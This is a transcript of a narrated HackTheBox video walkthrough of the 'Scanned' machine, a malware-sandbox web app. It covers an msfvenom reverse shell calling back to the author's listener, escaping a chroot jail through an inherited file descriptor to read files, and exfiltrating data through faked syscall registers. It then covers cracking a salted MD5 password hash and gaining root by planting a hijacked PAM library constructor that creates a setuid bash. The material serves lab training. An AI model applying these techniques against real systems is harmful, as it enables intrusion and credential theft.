What's going on YouTube? This is Ipsec. We're doing scan from HackTheBox, which is probably one of my favorite boxes, which is weird for me to say because it's an insane binary exploitation box, and I don't generally like binary exploitations, but this challenge doesn't involve any type of overflow, heap, or those things. Instead, it's all about exploiting a chroot jail. First, you have to abuse an open file handle by another process to escape the jail. And then for the privesc, you abuse the fact that you can write into the jail before things are executed and perform a path hijack because you can just execute a setuid binary, but you control the library, so you can do a constructor to get code execution before the setuid binary actually runs. And this is all tied together with a beautiful story because it's a realistic application that's a malware sandbox. You give it a program, it runs it, and gives you pretty much like the strace output of everything. So with all that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it scanned, and then the IP address of 10.10.11.141. This can take some time to run, so I've already ran it. Looking at the results, we see just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian box. The second thing we have is HTTP on port 80. Its banner tells us it's Nginx, and the title of the page is malware scanner. So let's just go take a look at the website. So 10.10.11.141, and we get a page that just says it's malscanner, a brand new, totally free and open source malware analysis sandbox. So how does it work? Simply just upload untrusted executables here, and it will run in a safe environment and output a list of all the syscalls and arguments. And we also have the source code. So I'm going to download the source code, and we'll move it over into a directory. But first, let's just see what it does. So copy that here, and we go to upload a sample, and we have to create a malicious binary. Well, it doesn't have to be malicious, but let's just create a binary. I'm going to start with MSFVenom. So MSFVenom-p Linux x64 shell _ reverse TCP. Lhost is going to be 10.10.14.8, my IP. L port is 9001. The format we want is ELF, and the name will just be called rev shell, I guess. So we'll let this run, and then when we upload it, we'll see if we get a callback. So nclvnp 9001. So this is doing two things. It's going to tell us if we have a network connection, and it's also going to just show us what this website looks like. So HTTP scanned rev shell. Let's upload it, submit the query, and I'm looking at my terminal. I'm not getting a connection back. It's still running. And we got output, but no connection. And we can see we got high priority syscalls, so we can see the socket, the connect. This isn't an IP, it's probably the location where my IP is. The result looks like it's -65 hex, so this is probably, since it's negative, saying could not connect. And then it tries to do execve things. We got medium priority syscalls, and then low. So just reading files, they think that's low. It's pretty nice how it's organized. And then a bunch of syscalls that it doesn't map that just says ignored. So we can see how this works. Let's now go over and view the source code. So make dir source, and then tar-xvf, source like this. And we have malscanner. If I look at malscanner, look at requirements.txt, we can see this is just a Django website. I'm not too interested in how the website works. I'm more interested in the sandbox. So it looks like it's just a small C program. I'm going to open it up in Visual Studio Code. So let's do file, open folder, and then HTTP scanned source sandbox, and we can look at make file to see exactly what this looks like. Makes a directory jails, does GCC. It's setting capabilities on this. whatever it compiles, and clean will delete it. So nothing too interesting there. Let's look at sandbox.c, because this is where main is going to be. So we can see it starts out doing check caps. If we look at it, it's just checking if capabilities exist. And it's nice and commented, so if we don't read the code, we can get an idea. I'm not going to go over like everything in this program. Instead, we're going to just learn by exploring it, because I find that to be the easiest way. Let's see. We got this function make jail. Right now, I'm just trying to get to the part of the program where it's executing our thing. So it looks like this binary is going to create the jail. So it's opening a handle to the folder jails in its current working directory. If it can't open, it says the name exists. I guess this is probably going to be a permission denied error if it can't create the jail. And then program, I'm guessing this is going to be the program that we pass in. So it's also making sure it can access the program. It's not executing it yet. It's going to change into the jails directory, then name. This is probably going to be just a name for running the program. We don't know what this is yet. Then it's going to copy the libraries into the jail. It's going to do namespaces. Then it's going to copy a program into the jail. And it's going to chroot, which is going to just create a, I don't want to say container, but just create a segmented environment. And then set GID, effective GID, user ID, and effective user ID. So setting the group and user to be 1001, and then executing do trace. And it's also important to note, I think only root can do a chroot. So we know this code probably is running as root, or it has the capability. If we looked at all the capabilities earlier, I'm guessing we would have got it. So do trace is probably going to be in tracing.c. And right now it looks like it's setting the dumpable capability, removing capabilities. And let's see. I'm trying to think what is important here. It's going to create child and then fork. So this is probably going to be PID 2. Because the jail, it's going to start at PID 1, which is this program itself. And then child, the first fork is PID 2. And then killer, this is probably going to be PID 3. And of course, PID 1 is this program. Or I guess we could call do log PID 1, because it's executing this function but not doing a fork, so it stays in this parent process. Let's look at exactly what do child is. So if we look at do child, it's going to prevent the child process from escaping chroot by closing jails FD. Now this is going to be super important. Because the process we're in doesn't have an open handle to the jails FD. If we go back to that, jails FD is just a pointer to the jails directory. And if this was not closed, well, we're going to see what happens if this isn't closed, because it's going to be open in the parent process, which is PID 1. And we can go into proc 1 to get into that process, and then slash, it's going to be, I think, at 3, because standard in out error is 012. So the next open file would be 3, and that's going to be a pointer to this directory. And because we have that pointer to this directory that's outside of a jail, we can abuse it to get to all the other directories outside of a jail, because essentially all the chroot does, it's not like a permissions thing. You just can't get to the directories because you don't have pointers to them. I want to say it's inodes, but it's probably not that. But from in your chroot, you just have no knowledge of what's outside of it. So it leaving this handle open in the parent process, because it only closes in the child, gives a program or exploit a way to see what's outside of chroot and access everything else. So let's look at what the do trace does then. So do killer, this is going to sleep 5 seconds and then kill the process. So do log is what we want to see maybe. Let's see. Yeah, do log is going to ptrace the running program and then output all of the syscalls. So it's doing a ptrace. So if you ever did like strace on a program, I know we've done that plenty of times on this video, essentially that's what it's doing to this program. And it's going to dump everything with this log syscall function. And if we look at what this does, is it's recording all the registers, and we can see all the registers are unsigned long, which are going to be 8 bytes. I'll show you how to verify that later, because well, we'll go into it in a minute. So 8 bytes, 8, 8, 8, 8. So this is going to be 8 things, which is 64 bytes. And it's going to write that into /log. And when it does it, it's making this 777, so we can edit /log. So what a goal is our program's going to run, it's going to overwrite /log, and then put information here which lets us run and get information out of this sandbox, right? So we'll be using these syscalls as an exfil path, which is really cool. But first, how do we know this is going to be 8 bytes? Because if we go over to Google and say unsigned long size, Google says 4 bytes. And I think that's probably going to be like a 32-bit thing. So let's just go and create a quick program. So I'm going to call this getSize.c, I guess. And we're just going to say int main. And then we want to do unsigned long, let's just call rax. And then we can do a printf size %i, like that. And then the variable rax, and we want to do size of, and then close this. So if we do gcc get size and execute what it gives us, we see 8. So we now know this is going to be 8 bytes. And this is going to be important because this page here has the syscall. And the syscall is going to be rax because that's just how assembly works. And then it's telling us what the output is. So that's going to be the return, I would guess. So we want to create a program that writes something in rax that we can pull, and then skips over all the bytes to get to the return and write something else. So let's create please subscribe.c, and just like last time, we can do int main. We're going to want to include standard io.h. Okay. So the first thing we want to do is create a file pointer to a file. And I'm just going to write it to out for output. And the reason why we do this, because at the end of the program, we're going to rename /out to /log. And the reason we do that is, again, because this page is generated based upon the output of /log. I'm not just writing everything straight to /log because I want to clobber /log and then just put my thing in. So I'm only saying data that we wanted at exfil. If we just wrote to /log, it would just be mixed in with all the other syscalls, right? We just want to delete log and recreate it. So now we want to write to /out. So I'm going to do well, first we should define the sizes to make it easy. So first I'm going to do unsigned char syscall, and this is going to be the first 8 bytes of it. And I'm just going to do 1, and then we'll do 7 zeros. So 1, 2, 3, so that's 4. We need 4 more. That should be 8. 1, 2, 3, 4, 5, 6, 7, 8. Good. The next thing we probably want to do is create our junk so we don't have to just write it every time. So unsigned char, junk, and remember we have 64 bytes we have to write. The last 8 are going to be the return value, so that gets us to 56. So we probably want 48. So 64 minus 16 is what I just did. So junk 48, and we're going to define all of that as null bytes, 0. Okay, so now we want to fwrite the syscall. That's going to write 1 and then a bunch of zeros. And write it from 1 to 8, and we write it to the pointer. And then we're going to do the same thing, but this time we're going to do junk. I'm going to write the whole size of junk, so 1 through 48 bytes. And then this next piece, we're going to write please su. This is 8 characters, I think. 1, 2, 3, 4, 5, 6, 7, 8. So 18 FP. Okay. And then we're going to do subscribe. I'm going to, write this up here. So I make sure it's 8 characters without having to count. B, scribe, we can add an exclamation point. Okay. So what this should be doing is we're going to open a handle out, write the syscall, and then a bunch of 7 blank bytes, so write 1, then 7 null bytes. Then we're going to fill it up with 48 more null bytes, because that's going to be all the other registers. That's this data. We don't care about that because the web page isn't outputting that information for us. And then we got return, which is going to be this one. So let's try compiling this. So GCC, please subscribe. I probably forgot a semicolon. There we go. And if we run this, so browse, let's do exploits, a.out, submit it, and we'll see what happens here. Waiting on it. And we have low priority syscalls 3, ignored syscalls. So this is probably just it exiting or something. But we have these writes. And write, if we look at a syscall table, is syscall 1. So if we did syscall, let's say 2 real quick. So let's change this to 2. I want to say 2 is read. I'm not positive. But let's just see what this does. Waiting on it. So we can see medium. Oh, it's open. So these are the first 3 arguments. So we could also put data here because we're controlling this. But we just got the return values here. So I'm going to go to CyberChef so we can quickly paste this. So we want to copy or decode it. Let's see. There we go. There's dark mode. Okay, so we want to go from hex. And it's kind of garbled. I'm going to swap the endianness real quick. Let's see. Word length 8. There we go. So we swap the endianness and then display the hex, and we see please subscribe. So we have now validated we can exfil information through this. The one thing I'm going to do is a little bit of style points because the syscall is just going to be hex, and I'm going to write 0x39, 0x05. And what this is going to do, again, this is endianness, so we're doing 255 5 times, and then going up 39. And if you can do math, or if I do math correctly, we will see what that syscall gets translated to. So submit query, waiting on it. So it's now in ignored syscalls, and we just see sysleet is equal to our please subscribe. So this is great. It's a bit of a pain having to do this through the web GUI every time. So let's just switch over real quick, create a Python script to submit it for us. Actually, before we do that, I want to intercept this call to see the level of effort it's going to be. Because this is Django, they could enable like server-side request CSRF tokens and things like that, which don't make it impossible. It just makes it a pain. I want to go to the intercept tab. Where are you? Target proxy. There we go. So let's see what this looks like. A.out. Submit query. And we can look at it. It's just a post to scan or upload. And we don't have anything. It's just uploading a file. So this should be super easy to code in Python. And that just sends us a 302 redirect for where we want to go. So let us create a upload.py. Okay, so we need to do our imports. So of course we need requests, we need regular expressions, and I'm going to use struct so we can copy the hex, which will be this data, back into ASCII. So the very first thing we need to do is open the file, and I'm going to do it in a way where we can just easily reuse this, and we need the name to be file. So we do file, colon, open, a.out, which is going to be a binary, and we open it as RB. So this should be the file parameter for a request module. So we can do r is equal to request.post, http 10.10.11.141, scanner upload, and then files is equal to files. And now the next piece we need to do is a regular expression. So p is equal to re.compile. And then we want to match everything that begins with sysleet. And I'm going to use a wildcard so I don't have to worry about escaping these parentheses. So sys underscore leet, then dot star equal space. And now we should be at this spot. So we're just going to say 0x, and now we just want to match any hexadecimal. So, and this is the match. We want to extract this information, so I put it in parentheses, and we can do 0 to 9, A through F, like that. And we need to match all the characters, and then what comes after it's probably going to be like an angled bracket or something like that. So this should be fine. And we need to close. I think that's good. And then the matches is going to be re.findAll, pr.text. And we can say for data in matches, let's just print the data now to see if it works. Python 3, upload.py. So now it is uploading. And hopefully we just get 2 hex values back. And we don't get anything. That sucks. So let's do print r.text to see what the page looks like. So we do have this. And I'm going to do online regex. I'm just going to use an automated, or not automated, but a web tester. And I want to copy my regex in, like this, paste, and we're not matching. So let's see, sys underscore. I'm guessing because I was talking and typing at the same time, but that should work. So we run upload again, and we get 2 hex values. Awesome. So let's get rid of that. Run. And we get it. So now that all that's left is to convert that back into ASCII. So we're going to use struct, and then pack, and the format, let's see, Python struct, I think it's Q. So let's see, we want integer 8 bytes. It looks like we can do either lowercase and uppercase Q. Okay. And then we do integer data and 16 for hex. So I'm going to put this. We can say, oh God. No, I don't know how to redo that. Let's just retype it. Struct pack Q int data 16, and we can say out equals and print out. So when we run this again, we get a syntax error, of course. There we go. Run it, and hopefully we get please subscribe. We kind of do. So we want to decode it. And then we also want to get rid of the line break that's default with print. So we do n equals double parentheses. So now when we run this, we just get please subscribe. And I guess at the end of the program, we can put a blank line break. But now we can automate our upload and exfil. So the next piece we want to get into is implementing an ls. And that is just so we can list files. Now, we can't just use like popen or system to execute binls because it doesn't exist in the jail. We could use the chroot escape to run ls off the host system. However, in order to understand the chroot escape, I found this to be super helpful of just being able to run ls and poke at the file system, right? So let us copy please subscribe over to ls.c, and then pretty much all the code I got from opendir example off of Google. So just go to Stack Overflow, and I'm pretty much copying the code and just using it as I see fit. So the first thing we need to do is include dirent.h. I think it stands for like directory entry. And I'm going to create a new function called ls, and we're going to pass it the directory. And there's going to be something weird that I do with this. We're going to write the output to a file and then read the file. It'll make sense once we go on, but in order to convert the output into the /log, this just makes it easier, and we can reuse the file read later. So let's do file. We need another pointer, and this is going to be where we write the results of the ls. We're just going to write it to /dir, and we do that. And then we need the structure set for the directory entry. So now we can open dir on directory, and we'll pass this directory in, and then a while dir is equal to readdir, and if that's not null, we want to write, so we do a fputs directory, and then dname is the file name, into fp. And then we want to write a line break also to fp. And we can close this pointer. So this command should just write a directory listing. I'm going to change this real quick to just /dir so we can test it out. And I'm going to comment out this rename. Actually, we can just delete those. And we just want to test this. So char directory is equal to /, need a semicolon, and then ls directory, like this. So if we run it, cat dir, we get a directory listing of /. Awesome. So I'm going to put this / back because we want, this just helps keep track of where it is. And then this next piece, we want to loop over this output and write it in the weird format we want, which is 64 bytes, but the last 8 bytes are actual data. So I'm going to create something called content. We'll define it right now as all null bytes, but this is going to be the return. Actually, let's just call it ret because that is what the return of our fake syscall is. So that makes sense. So we ran ls. So now we need to do another file pointer. We can do it now. Let's do, and we're going to call this maybe fp output, I guess, or we'll call this readfile, like this. I don't know a good thing to call it, but fp readfile is going to be equal to fopen and then /dir because that's where we wrote everything to. We open that in read mode. And then I'm going to create a variable read, and we'll set it to 0. And now we're going to do another loop. So read is equal to fread, and then this is going to be where the data goes. We're going to put it into ret, and then 1/8 for the 8 bytes of data. And it is coming from fp readfile. And we continue until there's no data left. And now we can do our fwrites. So we write the syscall 1/8 into just fp. This is going to be the /output. And then the next piece we write is junk. And this is going to be 48 bytes. That's all the other registers. And now we want to write our return. Okay. And now we want to close a pointer. So fclose fp, and then fclose fp readfile. And then we rename. Okay, GCC to compile it. And now the moment of truth. Does this work first try? Do we have a functional ls? We do. So now we can ls around. And if you remember the code, it copied user prog. This is our program. So that's where it's executing here in the child. We can see copying program to user prog. So this is the thing we uploaded. dir, this is going to be our output file. Log, this is what we overwrote. But let's go into proc. So let's do ls.c. And the directory we want to ls is /proc. So we gcc it again, Python 3 upload, and now we're going to be looking at all the processes, or the proc directory. And we can see there's 3 processes. This is going to be the main process. This is the one we want. This is our programs, and this is going to be killer. We went over that a little bit before. This just sleeps for 5 seconds, I think, and then kills. So let's look at the file descriptors for one. So let's do ls.c, and we'll change directory to be proc1 fd to see if we can read this. Compile it, run it, and waiting for it to run, we just get 0, 1, 2, 3. I don't know where this came from, but we have file descriptors. Now, if we test this out, so I'm going to, let's see, let's vim, let's go in source. Actually, we called it exploits. I'm going to vim please subscribe.c. I'm going to do a ps-ef on vim, and we can see that's PID 1832119. So I'm going to do ls proc 1832199/fd. And we can see all the file descriptors open by this. There's quite a bit more. And we can see they're all symlinks, right? This one is going to the vim swap file. We got some pipes. So this is the data we want. Unfortunately, our open dir call doesn't follow symlinks. So we're going to have to modify that to print out the symlink information. So I'm going to copy ls.c and we're going to call this lssim.c, I guess. I don't know. ls-readlink will probably be better. So let's edit that file, and we need to add a call to readlink. And I think it's going to be easier if we just create variables for the link and file name. So I'm going to do char link name 64, and it should be worth noted, this code is god awful and there's buffer overflows everywhere, but hopefully we don't hit any of those. There should be enough space for both the link name and the absolute name, which is going to be the file name. So the first thing we need to do is, let's see, I wonder if we should put this in a loop. Probably. So what we can do is a strcat to concatenate things, and we want to build the absolute name. So abs name, and the first thing it's going to be is the directory. And then after the directory, we want the file name. So abs name, dir d name. Okay, so absolute name, this is going to be like /proc fd 3. Yeah. So that's like an example. Proc, actually, I forgot the PID. So let's see, now we have the cat, we need to do the read link. So read link, the absolute name of the file, then we put it to the link name, and we can do size of link name, and then I always do -1 to account for if it has a line break, which I don't think it does. I don't think we have to, but that should be fine. And that's writing it into link name. So now we do all the fputs. So we wrote the directory name. Instead of a line break, let's just do a tab. And then we can do a, let's do something like that, I guess. And we want to do link name. And now line break. So I think that is all we need. Those are all warnings, so that should be fine. So Python 3 upload.py, and let's see what this output looks like. Hopefully it all works, because this is a pain to debug. And it does not. Oh man, that is ugly. So what do we have screwed up? So we go in this, we define absolute name and link name. And directory, let's see what directory set at. Oh, we didn't put a trailing slash on this. So it was probably just fd3 and screwed up. So let's try this again and see what happens now. There we go. So these don't have anything. We should have put like an if then to only display this arrow if there is a link. But we can see 0 is mapped to dev null. This is an out probably, or probably out and error. There's probably no standard in. Those are sockets. But we see 3 is mapped to var www mouse scanner sandbox jails. So because this exists outside of the ch root and we have a handle to it, we can do just a standard like LFI. So we can go ... slashes, right? And then etc passwd. So let us look, let's copy ls.c. I'm going to call this readfile.c. And this is going to be why we wrote this to a directory to make it super easy. So I'm just going to delete the ls because we don't care about it here. We can get rid of that. And fp readfile. And instead of /dir, we just do proc 1 fd3 and then a few ... slashes etc passwd. So this is mapped to the var www malware scan or whatever, and we're just doing directory traversal, going up and reading passwd. So let's gcc. We called it read file. And now let's just run the upload script and we get the output of passwd. I'm not sure what this NOL is, but we know this is from the box because we got sandbox, which is a user I don't have in my box. It looks like the user for this is Clarence as well. So now we can read files outside of our jail. So the next step is to now look at the Django code, the web code, because since we can read files, is there anything sensitive in the web? Always my first bet once I get shell on a web server is to dump the database. So I'm looking at the web code here, which is the Django, and we got malscanner.db. So this is where we want to go. I'm going to, let's see, what do we call it? Wasn't readlink? Yeah, we want readlink again, I think. I'm trying to think if we know exactly where this is running. I don't think, no. So let's do gcc ls readlink, upload it, because that leaks a path that I want to use. So I think it's just var www mouse scanner, then sandbox jails. So I'm going to do mal scanner, and then let's see. It's either mouse scanner, then malscanner.db, or just malscanner.db, most likely. So let's copy this and then look at read file. We can paste this. And I'm just going to do malscanner.db, and we'll see if the file is here. Is there a read binary in this? I wonder if we should have been using that. Let's see. I think that's all we need. gcc readfile.c, upload, takes a few seconds, and we'll see what happens. I'm guessing our Python code will probably error because we got this UTF codec can't decode byte. So we should just write this to a file because the database is going to have non-ASCII characters. So I'm going to say f is equal to open. I'm going to call it malscanner. Let's see, cp upload 2.py. And this will be f is equal to open malscanner.db, write binary. like that. And we just want to write this. So f.write out. So I think that's all we need. Python 3 upload 2.py. Run it again. File mouseScanner.db is a SQLite database. So SQLite 3.dump, and it is corrupted. But if we run a strings against it, we can see data. So this should be fine, potentially. Right here, I see an MD5 hash. And I'm guessing it stops right here because this is where 2021 is, and it's for clearance. So v hashes.text, we got that. Let's see, grep MD5, is there any other? It looks like that is the only one. So we should try cracking this hash. So I'm going to go over to the Kraken, which is just a box on my network. You can use hashcat on your main computer. I just don't like doing it when I'm recording because it's very CPU intensive. I don't want like drop frames and things like that. So let's get the hash. I think I put in exploits. Cat hashes.text. And what we're going to do is figure out the format for this. So v hashes scan.md5, because this isn't a real hash format. We do have MD5 telling us it's that, and $2. So one's probably the salt, one's the password. And if we go to hashcat example hashes, it gives us an idea how this works. So pulling this up, it's either probably going to be 10 or 20. Either the password and the salt's at the end of the password, or you have the salt and then the password is at the end of that. So if you don't know, all salt is, it's a random thing that's put before a password to prevent rainbow table style attacks. So if your password was please subscribe and the salt was like a static salt for everything, and the salt was IP, then it would be IP please subscribe with it before, or please subscribe IP afterwards, and it just makes it tougher for pre-computed attacks to take advantage of it, especially if the salt is random, because it essentially makes every password somewhat random. So let's go and figure this out. The example format puts the MD5 looking thing first, and then this. And right off the bat, I know this is going to be the MD5 looking thing because this is hex and capital L is not valid. So let's put this at the end like that. I think it started with K. I would hope it did. What was it? Hold on. DW and P. Okay. There we go. That's what I wanted. So let's try /hashcat mode 20 hashes scan.md5 and then opt word list rocku.text to see if it cracks in this format. Generally, most salts are going to be before the password. And we get recovered 1, and the password is one day you feel like crying. So let's copy this and v password.text. And we don't know where this password goes to, so we probably should have saved the output of etc passwd, but we can just run it again. So instead of this, we can just put the file back to etc passwd and run it and see what we get. So etc passwd and v, I think upload.py just prints it. Yep. So Python, well, gcc, readfile, then Python 3 upload.py. This should get us the passwd file, Probably should have wrote to a directory so we could grep this, because we want to look for everything that ends in sh, because those would be valid accounts we could potentially log in as. Let's see. There we go. That clipboard. Third time is the charm. Grep passwd. Let's grep everything that ends in sh. So there's only one user on the box with that. So let's get password.text again and try SSHing as Clarence. So SSH Clarence at 10.10.11.141. Paste in the password, and we get logged in. So now we are a user on Scanned. This next part is relatively straightforward, but does involve a lot of just Linux internal knowledge and just abusing the chroot. So we know that the sandbox is in var www malware scanner. And if we go into the sandbox, there is this binary that the website executes. So if I do lsjails, it's empty, but if we run our upload script and look at jails, we now have an MD5 sum. And if we go in here, we actually can't because we don't have execute permission on this, I think, or read. So we can't look at that jail. But if we execute the binary, it wants a program and a UUID. The UUID is just going to be what the jail gets called. So I'm just going to pass it bin su. It doesn't matter what program we put. And then we put anything we want for the jail name. So I'm going to put ipsec here, right? And right off the bat, we get an error of it trying to run su because it can't load any shared libraries because this jail is super strict locked down. But if I go into the jails directory, we can see there's now ipsec because that's what this jail is. So doing an ls here, we can see user prog. This is going to be MD5 sum. And the trick here with exploiting chroots is this is the root file system as far as the program is concerned. So if we find a way to copy all the libraries in here and execute the SU program, it's going to have setuid, and we do some type of path hijack thing and get our library to execute code that we want. And because it's got setuid permission, because that's what SU has on this file system, we can escalate back up to root. So this whole sandbox, it starts as root. They drop our permissions down to the sandbox user. And what we're going to do is use SU and path hijacking to elevate ourselves back up to root and then escape the jail again. So again, this whole thing is off the premise that number one, we can write a library into this jail. And number two, it's a chroot. So when the setuid binary goes into like lib library.so.0, whatever it tries to load, we can control that library. So the first step is to run LDD, which is going to show all the libraries a program needs. And remember, when we ran bin su, it said we couldn't load a library, right? So all these files here is what we need to put in because this elf binary su is expecting libpam so. It's going to be expecting it at this directory, right? So what I'm going to do is just go into temp. I'm going to make a directory lib, and we're just going to copy each of these into lib. So we can copy this. We probably should have done a loop. libc is there already, so we don't want to copy that one again, although I don't think it would hurt anything. But just a few more. This one and this one. And we just copy this into the directory we just created. And we have to pick a library we want to use with this. And I think the one that makes the most sense is just the libpam miscellaneous because it's probably going to be used the least amount. Libpam's probably used thoroughly. And we just have to match the exports because if a library is calling libpam or trying to load it and load something that this uses and it's not there, then the program's going to crash before we can get code execution. So we're going to choose the libpam miscellaneous.so. And all we're going to do is create a function that executes a command that we want. And whenever it loads that library, it does that. So I'm going to call this libpam miscellaneous.c. And what we need to do is create a constructor. So I'm going to Google C library constructor. And we're just going to copy some code because I never remember exactly the header. So this will be called first and this is called last. So let's create this. And the constructors get called before main. I'm just going to rename this to exploit. And we want to copy this, paste, exploit, and this is all the code we'll want to run. So I'm going to do a set effective UID 0 and also a set UID 0. And then we also want to do that with GID, so effective GID 0 and set GID 0. And there's no reason I'm not putting this on 4 lines other than this is just how I'm used to writing it. The next thing we need is to create a file name. So char file name, and this is going to be proc 1 fd 3, and this is going to be a binary we want to interact with. So we're going to make this a setuid shell. So temp please subscribe will be just a shell that executes bash. And we do this to escape the sandbox, the proc 1 fd. And now we want to set the permissions on this. So I'm going to do 4755. And we need to make the permissions an integer to pass it to the command. So we're going to do string to long. And we'll do perm 08. I think that's how we do it in this. And now we can do a chown. So fname, and then we want to do 00 to make it root owned. And then a chmod, fname, and then the permissions. So we'll do iperm. We probably need to include a few things. So I'm just going to copy this stdio. Okay. And now we can try compiling. So gcc shared because it's a library, want it position independent, libpam misc.c, and we'll call it libpam misc. We have a few things, but I think the compiler fixed this for us. It's because we didn't include a library. So I'm going to move libpam misc over top of our current one. Okay. And we actually want to create a new program as well that we're going to be uploading. So let's see. I'm going to copy the readfile.c. I'm going to call it execfile.c. And let's see. Instead of this fopen, I'll do a popen. I think that's pretty much it. And we'll do bin su. Bin su. We don't need read binary. And now, before we do this, we do want to call a sleep. So I'm going to sleep for 2 seconds. And the reason we do this is because when we run this program, we don't want to execute su right away because we have to copy the files into the jail. So I'm going to gcc exec file. I think we got it. I'm just going to call this root me. We have it, python 3-m http server, and we can download the root me. Okay. So I think, let's just make everything executable because we're lazy. I think we're all good. So let's go back into var www mal scanner, go into sandbox, and we're going to run. Actually, I'm going to get a command ready. So cp temp lib star. I'm going to copy it to jails 0 ldd bin su cp temp lib star to jails 0 in this directory. Okay, and I did that so I can run this command very fast. So I'm going to do /sandbox temp root me, temp lib root me, and then 0 and put this in the background, and then immediately copy all the libraries in there. So now when su is ran, we get this here and we have a undefined symbol, this miscellaneous convert. So remember when I said we had to get all the exports in? This is because we're missing something. So let's go back into temp lib, go into, where is the .c? libpam_misc.c. And we just want to create the function. And it's going to do nothing. We just have to have it there, so if it tries to load it, it can. Did I do that right? I believe so. So -shared, and I will just copy it over top of the right file, like that. I don't see any error. I'm just going to remove this and run it again. I should fix my code so we don't get all those warnings, but I think we're good. That just got created. So let's redo what we had just done. Oh, I forgot. One last thing. We have this code, right? libpam_misc, and it's executing please subscribe. We have to make that setuid binary. So I'm just going to cp bin bash because I'm lazy over to temp please subscribe. And that's what we called it, right? Yes. So I do lsla on temp please subscribe. We see it's owned by Clarence, not setuid. So now when we go into var www mal scanner sandbox, and do we still have that jail there? We do. What's the date? I think it clears every like 5 or 10 minutes. So let's get our cp command back up. What was it? If I do /0 like that, I'm going to copy it to 1. And we'll do /sandbox, write it to 1, and do this fast. And let's see, user root does not exist or the entry does not contain all the required fields. So I'm not sure exactly what that error is. If we do lsla on temp, we see please subscribe is owned by root. So it probably just kept going on and tried to execute the su program and just failed. But we have please subscribe and it's setuid. So if I execute please subscribe, do ID, we are not root because we probably have to add the -p flag to take advantage of the setuid and do ID. And now we are root. So if I do cd/root, we can get to root.txt. And if you want to know more about that, if we do man bash and search for -p, let's see. Effective group. So yeah, this just takes advantage of the setuid. I don't want to read this whole command prompt if it's not sticking right out, but yeah. So hope you guys enjoyed the box. Take care, and I will see you all next week.